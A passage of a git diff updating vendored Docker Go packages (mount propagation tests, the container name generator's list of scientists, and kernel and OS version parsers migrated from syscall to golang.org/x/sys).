return nil, nil } diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go index 8ceec84bc6..538f6637a0 100644 --- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go @@ -1,6 +1,4 @@ -// +build linux - -package mount +package mount // import "github.com/docker/docker/pkg/mount" // MakeShared ensures a mounted filesystem has the SHARED mount option enabled. // See the supported options in flags.go for further reference. diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go index c1837942e3..019514491f 100644 --- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go @@ -1,16 +1,21 @@ // +build linux -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "os" "path" - "syscall" "testing" + + "golang.org/x/sys/unix" ) // nothing is propagated in or out func TestSubtreePrivate(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -109,6 +114,10 @@ func TestSubtreePrivate(t *testing.T) { // Testing that when a target is a shared mount, // then child mounts propagate to the source func TestSubtreeShared(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -177,6 +186,10 @@ func TestSubtreeShared(t *testing.T) { // testing that mounts to a shared source show up in the slave target, // and that mounts into a slave target do _not_ show up in the shared source func TestSubtreeSharedSlave(t *testing.T) { + if os.Getuid() != 0 { + 
t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -281,6 +294,10 @@ func TestSubtreeSharedSlave(t *testing.T) { } func TestSubtreeUnbindable(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -309,7 +326,7 @@ func TestSubtreeUnbindable(t *testing.T) { }() // then attempt to mount it to target. It should fail - if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != syscall.EINVAL { + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != unix.EINVAL { t.Fatal(err) } else if err == nil { t.Fatalf("%q should not have been bindable", sourceDir) diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go deleted file mode 100644 index 09f6b03cbc..0000000000 --- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go +++ /dev/null @@ -1,58 +0,0 @@ -// +build solaris - -package mount - -// MakeShared ensures a mounted filesystem has the SHARED mount option enabled. -// See the supported options in flags.go for further reference. -func MakeShared(mountPoint string) error { - return ensureMountedAs(mountPoint, "shared") -} - -// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled. -// See the supported options in flags.go for further reference. -func MakeRShared(mountPoint string) error { - return ensureMountedAs(mountPoint, "rshared") -} - -// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled. -// See the supported options in flags.go for further reference. -func MakePrivate(mountPoint string) error { - return ensureMountedAs(mountPoint, "private") -} - -// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option -// enabled. 
See the supported options in flags.go for further reference. -func MakeRPrivate(mountPoint string) error { - return ensureMountedAs(mountPoint, "rprivate") -} - -// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled. -// See the supported options in flags.go for further reference. -func MakeSlave(mountPoint string) error { - return ensureMountedAs(mountPoint, "slave") -} - -// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled. -// See the supported options in flags.go for further reference. -func MakeRSlave(mountPoint string) error { - return ensureMountedAs(mountPoint, "rslave") -} - -// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option -// enabled. See the supported options in flags.go for further reference. -func MakeUnbindable(mountPoint string) error { - return ensureMountedAs(mountPoint, "unbindable") -} - -// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount -// option enabled. See the supported options in flags.go for further reference. -func MakeRUnbindable(mountPoint string) error { - return ensureMountedAs(mountPoint, "runbindable") -} - -func ensureMountedAs(mountPoint, options string) error { - // TODO: Solaris does not support bind mounts. - // Evaluate lofs and also look at the relevant - // mount flags to be supported. 
- return nil -} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go index 18a939b70b..7fd5955beb 100644 --- a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go @@ -2,10 +2,13 @@ package main import ( "fmt" + "math/rand" + "time" "github.com/docker/docker/pkg/namesgenerator" ) func main() { + rand.Seed(time.Now().UnixNano()) fmt.Println(namesgenerator.GetRandomName(0)) } diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go index cfb8157d69..5c3395aaaa 100644 --- a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go @@ -1,9 +1,8 @@ -package namesgenerator +package namesgenerator // import "github.com/docker/docker/pkg/namesgenerator" import ( "fmt" - - "github.com/docker/docker/pkg/random" + "math/rand" ) var ( @@ -56,7 +55,6 @@ var ( "jolly", "jovial", "keen", - "kickass", "kind", "laughing", "loving", @@ -95,6 +93,7 @@ var ( "upbeat", "vibrant", "vigilant", + "vigorous", "wizardly", "wonderful", "xenodochial", @@ -151,6 +150,9 @@ var ( // Alexander Graham Bell - an eminent Scottish-born scientist, inventor, engineer and innovator who is credited with inventing the first practical telephone - https://en.wikipedia.org/wiki/Alexander_Graham_Bell "bell", + // Karl Friedrich Benz - a German automobile engineer. Inventor of the first practical motorcar. https://en.wikipedia.org/wiki/Karl_Benz + "benz", + // Homi J Bhabha - was an Indian nuclear physicist, founding director, and professor of physics at the Tata Institute of Fundamental Research. 
Colloquially known as "father of Indian nuclear programme"- https://en.wikipedia.org/wiki/Homi_J._Bhabha "bhabha", @@ -190,6 +192,15 @@ var ( // Subrahmanyan Chandrasekhar - Astrophysicist known for his mathematical theory on different stages and evolution in structures of the stars. He has won nobel prize for physics - https://en.wikipedia.org/wiki/Subrahmanyan_Chandrasekhar "chandrasekhar", + //Sergey Alexeyevich Chaplygin (Russian: Серге́й Алексе́евич Чаплы́гин; April 5, 1869 – October 8, 1942) was a Russian and Soviet physicist, mathematician, and mechanical engineer. He is known for mathematical formulas such as Chaplygin's equation and for a hypothetical substance in cosmology called Chaplygin gas, named after him. https://en.wikipedia.org/wiki/Sergey_Chaplygin + "chaplygin", + + // Asima Chatterjee was an indian organic chemist noted for her research on vinca alkaloids, development of drugs for treatment of epilepsy and malaria - https://en.wikipedia.org/wiki/Asima_Chatterjee + "chatterjee", + + // Pafnuty Chebyshev - Russian mathematician. He is known fo his works on probability, statistics, mechanics, analytical geometry and number theory https://en.wikipedia.org/wiki/Pafnuty_Chebyshev + "chebyshev", + //Claude Shannon - The father of information theory and founder of digital circuit design theory. (https://en.wikipedia.org/wiki/Claude_Shannon) "shannon", @@ -237,6 +248,9 @@ var ( // Gertrude Elion - American biochemist, pharmacologist and the 1988 recipient of the Nobel Prize in Medicine - https://en.wikipedia.org/wiki/Gertrude_Elion "elion", + // Alexandra Asanovna Elbakyan (Russian: Алекса́ндра Аса́новна Элбакя́н) is a Kazakhstani graduate student, computer programmer, internet pirate in hiding, and the creator of the site Sci-Hub. Nature has listed her in 2016 in the top ten people that mattered in science, and Ars Technica has compared her to Aaron Swartz. 
- https://en.wikipedia.org/wiki/Alexandra_Elbakyan + "elbakyan", + // Douglas Engelbart gave the mother of all demos: https://en.wikipedia.org/wiki/Douglas_Engelbart "engelbart", @@ -291,6 +305,9 @@ var ( // Werner Heisenberg was a founding father of quantum mechanics. https://en.wikipedia.org/wiki/Werner_Heisenberg "heisenberg", + // Grete Hermann was a German philosopher noted for her philosophical work on the foundations of quantum mechanics. https://en.wikipedia.org/wiki/Grete_Hermann + "hermann", + // Jaroslav Heyrovský was the inventor of the polarographic method, father of the electroanalytical method, and recipient of the Nobel Prize in 1959. His main field of work was polarography. https://en.wikipedia.org/wiki/Jaroslav_Heyrovsk%C3%BD "heyrovsky", @@ -309,6 +326,9 @@ var ( // Hypatia - Greek Alexandrine Neoplatonist philosopher in Egypt who was one of the earliest mothers of mathematics - https://en.wikipedia.org/wiki/Hypatia "hypatia", + // Mary Jackson, American mathematician and aerospace engineer who earned the highest title within NASA's engineering department - https://en.wikipedia.org/wiki/Mary_Jackson_(engineer) + "jackson", + // Yeong-Sil Jang was a Korean scientist and astronomer during the Joseon Dynasty; he invented the first metal printing press and water gauge. https://en.wikipedia.org/wiki/Jang_Yeong-sil "jang", @@ -318,6 +338,9 @@ var ( // Mary Lou Jepsen, was the founder and chief technology officer of One Laptop Per Child (OLPC), and the founder of Pixel Qi. https://en.wikipedia.org/wiki/Mary_Lou_Jepsen "jepsen", + // Katherine Coleman Goble Johnson - American physicist and mathematician contributed to the NASA. https://en.wikipedia.org/wiki/Katherine_Johnson + "johnson", + // Irène Joliot-Curie - French scientist who was awarded the Nobel Prize for Chemistry in 1935. Daughter of Marie and Pierre Curie. https://en.wikipedia.org/wiki/Ir%C3%A8ne_Joliot-Curie "joliot", @@ -327,12 +350,21 @@ var ( // A. P. J. 
Abdul Kalam - is an Indian scientist aka Missile Man of India for his work on the development of ballistic missile and launch vehicle technology - https://en.wikipedia.org/wiki/A._P._J._Abdul_Kalam "kalam", + // Sergey Petrovich Kapitsa (Russian: Серге́й Петро́вич Капи́ца; 14 February 1928 – 14 August 2012) was a Russian physicist and demographer. He was best known as host of the popular and long-running Russian scientific TV show, Evident, but Incredible. His father was the Nobel laureate Soviet-era physicist Pyotr Kapitsa, and his brother was the geographer and Antarctic explorer Andrey Kapitsa. - https://en.wikipedia.org/wiki/Sergey_Kapitsa + "kapitsa", + // Susan Kare, created the icons and many of the interface elements for the original Apple Macintosh in the 1980s, and was an original employee of NeXT, working as the Creative Director. https://en.wikipedia.org/wiki/Susan_Kare "kare", + // Mstislav Keldysh - a Soviet scientist in the field of mathematics and mechanics, academician of the USSR Academy of Sciences (1946), President of the USSR Academy of Sciences (1961–1975), three times Hero of Socialist Labor (1956, 1961, 1971), fellow of the Royal Society of Edinburgh (1968). https://en.wikipedia.org/wiki/Mstislav_Keldysh + "keldysh", + // Mary Kenneth Keller, Sister Mary Kenneth Keller became the first American woman to earn a PhD in Computer Science in 1965. https://en.wikipedia.org/wiki/Mary_Kenneth_Keller "keller", + // Johannes Kepler, German astronomer known for his three laws of planetary motion - https://en.wikipedia.org/wiki/Johannes_Kepler + "kepler", + // Har Gobind Khorana - Indian-American biochemist who shared the 1968 Nobel Prize for Physiology - https://en.wikipedia.org/wiki/Har_Gobind_Khorana "khorana", @@ -396,6 +428,9 @@ var ( // Kay McNulty - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Kathleen_Antonelli "mcnulty", + // Dmitri Mendeleev - a chemist and inventor. 
He formulated the Periodic Law, created a farsighted version of the periodic table of elements, and used it to correct the properties of some already discovered elements and also to predict the properties of eight elements yet to be discovered. https://en.wikipedia.org/wiki/Dmitri_Mendeleev + "mendeleev", + // Lise Meitner - Austrian/Swedish physicist who was involved in the discovery of nuclear fission. The element meitnerium is named after her - https://en.wikipedia.org/wiki/Lise_Meitner "meitner", @@ -417,6 +452,9 @@ var ( // Ian Murdock - founder of the Debian project - https://en.wikipedia.org/wiki/Ian_Murdock "murdock", + // John von Neumann - todays computer architectures are based on the von Neumann architecture. https://en.wikipedia.org/wiki/Von_Neumann_architecture + "neumann", + // Isaac Newton invented classic mechanics and modern optics. https://en.wikipedia.org/wiki/Isaac_Newton "newton", @@ -459,6 +497,9 @@ var ( // Laura Poitras is a director and producer whose work, made possible by open source crypto tools, advances the causes of truth and freedom of information by reporting disclosures by whistleblowers such as Edward Snowden. https://en.wikipedia.org/wiki/Laura_Poitras "poitras", + // Tat’yana Avenirovna Proskuriakova (Russian: Татья́на Авени́ровна Проскуряко́ва) (January 23 [O.S. January 10] 1909 – August 30, 1985) was a Russian-American Mayanist scholar and archaeologist who contributed significantly to the deciphering of Maya hieroglyphs, the writing system of the pre-Columbian Maya civilization of Mesoamerica. 
https://en.wikipedia.org/wiki/Tatiana_Proskouriakoff + "proskuriakova", + // Claudius Ptolemy - a Greco-Egyptian writer of Alexandria, known as a mathematician, astronomer, geographer, astrologer, and poet of a single epigram in the Greek Anthology - https://en.wikipedia.org/wiki/Ptolemy "ptolemy", @@ -510,6 +551,9 @@ var ( // Richard Matthew Stallman - the founder of the Free Software movement, the GNU project, the Free Software Foundation, and the League for Programming Freedom. He also invented the concept of copyleft to protect the ideals of this movement, and enshrined this concept in the widely-used GPL (General Public License) for software. https://en.wikiquote.org/wiki/Richard_Stallman "stallman", + // Lina Solomonovna Stern (or Shtern; Russian: Лина Соломоновна Штерн; 26 August 1878 – 7 March 1968) was a Soviet biochemist, physiologist and humanist whose medical discoveries saved thousands of lives at the fronts of World War II. She is best known for her pioneering work on blood–brain barrier, which she described as hemato-encephalic barrier in 1921. https://en.wikipedia.org/wiki/Lina_Stern + "shtern", + // Michael Stonebraker is a database research pioneer and architect of Ingres, Postgres, VoltDB and SciDB. Winner of 2014 ACM Turing Award. https://en.wikipedia.org/wiki/Michael_Stonebraker "stonebraker", @@ -522,6 +566,9 @@ var ( // Bertha Swirles was a theoretical physicist who made a number of contributions to early quantum theory. https://en.wikipedia.org/wiki/Bertha_Swirles "swirles", + // Valentina Tereshkova is a russian engineer, cosmonaut and politician. She was the first woman flying to space in 1963. In 2013, at the age of 76, she offered to go on a one-way mission to mars. https://en.wikipedia.org/wiki/Valentina_Tereshkova + "tereshkova", + // Nikola Tesla invented the AC electric system and every gadget ever used by a James Bond villain. 
https://en.wikipedia.org/wiki/Nikola_Tesla "tesla", @@ -537,12 +584,18 @@ var ( // Varahamihira - Ancient Indian mathematician who discovered trigonometric formulae during 505-587 CE - https://en.wikipedia.org/wiki/Var%C4%81hamihira#Contributions "varahamihira", + // Dorothy Vaughan was a NASA mathematician and computer programmer on the SCOUT launch vehicle program that put America's first satellites into space - https://en.wikipedia.org/wiki/Dorothy_Vaughan + "vaughan", + // Sir Mokshagundam Visvesvaraya - is a notable Indian engineer. He is a recipient of the Indian Republic's highest honour, the Bharat Ratna, in 1955. On his birthday, 15 September is celebrated as Engineer's Day in India in his memory - https://en.wikipedia.org/wiki/Visvesvaraya "visvesvaraya", // Christiane Nüsslein-Volhard - German biologist, won Nobel Prize in Physiology or Medicine in 1995 for research on the genetic control of embryonic development. https://en.wikipedia.org/wiki/Christiane_N%C3%BCsslein-Volhard "volhard", + // Cédric Villani - French mathematician, won Fields Medal, Fermat Prize and Poincaré Price for his work in differential geometry and statistical mechanics. https://en.wikipedia.org/wiki/C%C3%A9dric_Villani + "villani", + // Marlyn Wescoff - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Marlyn_Meltzer "wescoff", @@ -569,6 +622,9 @@ var ( // Ada Yonath - an Israeli crystallographer, the first woman from the Middle East to win a Nobel prize in the sciences. https://en.wikipedia.org/wiki/Ada_Yonath "yonath", + + // Nikolay Yegorovich Zhukovsky (Russian: Никола́й Его́рович Жуко́вский, January 17 1847 – March 17, 1921) was a Russian scientist, mathematician and engineer, and a founding father of modern aero- and hydrodynamics. Whereas contemporary scientists scoffed at the idea of human flight, Zhukovsky was the first to undertake the study of airflow. He is often called the Father of Russian Aviation. 
https://en.wikipedia.org/wiki/Nikolay_Yegorovich_Zhukovsky + "zhukovsky", } ) @@ -576,15 +632,14 @@ var ( // formatted as "adjective_surname". For example 'focused_turing'. If retry is non-zero, a random // integer between 0 and 10 will be added to the end of the name, e.g `focused_turing3` func GetRandomName(retry int) string { - rnd := random.Rand begin: - name := fmt.Sprintf("%s_%s", left[rnd.Intn(len(left))], right[rnd.Intn(len(right))]) + name := fmt.Sprintf("%s_%s", left[rand.Intn(len(left))], right[rand.Intn(len(right))]) if name == "boring_wozniak" /* Steve Wozniak is not boring */ { goto begin } if retry > 0 { - name = fmt.Sprintf("%s%d", name, rnd.Intn(10)) + name = fmt.Sprintf("%s%d", name, rand.Intn(10)) } return name } diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go index d1a94977d7..6ee31e9c33 100644 --- a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go @@ -1,4 +1,4 @@ -package namesgenerator +package namesgenerator // import "github.com/docker/docker/pkg/namesgenerator" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go index 7738fc7411..94780ef610 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go @@ -2,7 +2,7 @@ // Package kernel provides helper function to get, parse and compare kernel // versions for different platforms. 
-package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go index 71f205b285..6e599eebcc 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go @@ -2,7 +2,7 @@ // Package kernel provides helper function to get, parse and compare kernel // versions for different platforms. -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go index 744d5e1f83..8a9aa31225 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go @@ -1,13 +1,13 @@ -// +build linux freebsd solaris +// +build linux freebsd openbsd // Package kernel provides helper function to get, parse and compare kernel // versions for different platforms. -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "bytes" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) // GetKernelVersion gets the current kernel version. 
@@ -17,18 +17,8 @@ func GetKernelVersion() (*VersionInfo, error) { return nil, err } - release := make([]byte, len(uts.Release)) - - i := 0 - for _, c := range uts.Release { - release[i] = byte(c) - i++ - } - // Remove the \x00 from the release for Atoi to parse correctly - release = release[:bytes.IndexByte(release, 0)] - - return ParseRelease(string(release)) + return ParseRelease(string(uts.Release[:bytes.IndexByte(uts.Release[:], 0)])) } // CheckKernelVersion checks if current kernel is newer than (or equal to) diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go index dc8c0e307b..2f36490c53 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go index 80fab8ff64..b7b15a1fd2 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go @@ -1,11 +1,10 @@ -// +build windows - -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "fmt" - "syscall" - "unsafe" + + "golang.org/x/sys/windows" + "golang.org/x/sys/windows/registry" ) // VersionInfo holds information about the kernel. @@ -23,41 +22,24 @@ func (k *VersionInfo) String() string { // GetKernelVersion gets the current kernel version. 
func GetKernelVersion() (*VersionInfo, error) { - var ( - h syscall.Handle - dwVersion uint32 - err error - ) - KVI := &VersionInfo{"Unknown", 0, 0, 0} - if err = syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, - syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), - 0, - syscall.KEY_READ, - &h); err != nil { + k, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion`, registry.QUERY_VALUE) + if err != nil { return KVI, err } - defer syscall.RegCloseKey(h) + defer k.Close() - var buf [1 << 10]uint16 - var typ uint32 - n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 - - if err = syscall.RegQueryValueEx(h, - syscall.StringToUTF16Ptr("BuildLabEx"), - nil, - &typ, - (*byte)(unsafe.Pointer(&buf[0])), - &n); err != nil { + blex, _, err := k.GetStringValue("BuildLabEx") + if err != nil { return KVI, err } - - KVI.kvi = syscall.UTF16ToString(buf[:]) + KVI.kvi = blex // Important - docker.exe MUST be manifested for this API to return // the correct information. - if dwVersion, err = syscall.GetVersion(); err != nil { + dwVersion, err := windows.GetVersion() + if err != nil { return KVI, err } diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go index bb9b32641e..212ff4502b 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go @@ -1,18 +1,16 @@ -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" -import ( - "syscall" -) +import "golang.org/x/sys/unix" // Utsname represents the system name structure. -// It is passthrough for syscall.Utsname in order to make it portable with +// It is passthrough for unix.Utsname in order to make it portable with // other platforms where it is not available. 
-type Utsname syscall.Utsname +type Utsname unix.Utsname -func uname() (*syscall.Utsname, error) { - uts := &syscall.Utsname{} +func uname() (*unix.Utsname, error) { + uts := &unix.Utsname{} - if err := syscall.Uname(uts); err != nil { + if err := unix.Uname(uts); err != nil { return nil, err } return uts, nil diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go index 49370bd3dd..b2139b60e8 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go @@ -1,4 +1,4 @@ -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "golang.org/x/sys/unix" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go index 1da3f239fa..97906e4cd7 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!solaris +// +build !linux -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go index e04a3499af..b251d6aed6 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go @@ -1,6 +1,6 @@ // Package operatingsystem provides helper function to get the operating system // name for different platforms. 
-package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( "bufio" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go deleted file mode 100644 index d08ad14860..0000000000 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go +++ /dev/null @@ -1,37 +0,0 @@ -// +build solaris,cgo - -package operatingsystem - -/* -#include -*/ -import "C" - -import ( - "bytes" - "errors" - "io/ioutil" -) - -var etcOsRelease = "/etc/release" - -// GetOperatingSystem gets the name of the current operating system. -func GetOperatingSystem() (string, error) { - b, err := ioutil.ReadFile(etcOsRelease) - if err != nil { - return "", err - } - if i := bytes.Index(b, []byte("\n")); i >= 0 { - b = bytes.Trim(b[:i], " ") - return string(b), nil - } - return "", errors.New("release not found") -} - -// IsContainerized returns true if we are running inside a container. 
-func IsContainerized() (bool, error) { - if C.getzoneid() != 0 { - return true, nil - } - return false, nil -} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go index bc91c3c533..f4792d37d5 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go @@ -1,6 +1,6 @@ // +build freebsd darwin -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go index e7120c65c4..d10ed4cdcd 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go index 3c86b6af9c..372de51469 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go @@ -1,43 +1,45 @@ -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( - "syscall" - "unsafe" -) + "fmt" -// See https://code.google.com/p/go/source/browse/src/pkg/mime/type_windows.go?r=d14520ac25bf6940785aabb71f5be453a286f58c -// for a 
similar sample + "golang.org/x/sys/windows/registry" +) // GetOperatingSystem gets the name of the current operating system. func GetOperatingSystem() (string, error) { - var h syscall.Handle - // Default return value ret := "Unknown Operating System" - if err := syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, - syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), - 0, - syscall.KEY_READ, - &h); err != nil { + k, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion`, registry.QUERY_VALUE) + if err != nil { return ret, err } - defer syscall.RegCloseKey(h) - - var buf [1 << 10]uint16 - var typ uint32 - n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 - - if err := syscall.RegQueryValueEx(h, - syscall.StringToUTF16Ptr("ProductName"), - nil, - &typ, - (*byte)(unsafe.Pointer(&buf[0])), - &n); err != nil { + defer k.Close() + + pn, _, err := k.GetStringValue("ProductName") + if err != nil { + return ret, err + } + ret = pn + + ri, _, err := k.GetStringValue("ReleaseId") + if err != nil { + return ret, err + } + ret = fmt.Sprintf("%s Version %s", ret, ri) + + cbn, _, err := k.GetStringValue("CurrentBuildNumber") + if err != nil { + return ret, err + } + + ubr, _, err := k.GetIntegerValue("UBR") + if err != nil { return ret, err } - ret = syscall.UTF16ToString(buf[:]) + ret = fmt.Sprintf("%s (OS Build %s.%d)", ret, cbn, ubr) return ret, nil } diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers.go b/vendor/github.com/docker/docker/pkg/parsers/parsers.go index acc897168f..c4186a4c0a 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/parsers.go +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers.go @@ -1,7 +1,7 @@ // Package parsers provides helper functions to parse and validate different type // of string. It can be hosts, unix addresses, tcp addresses, filters, kernel // operating system versions. 
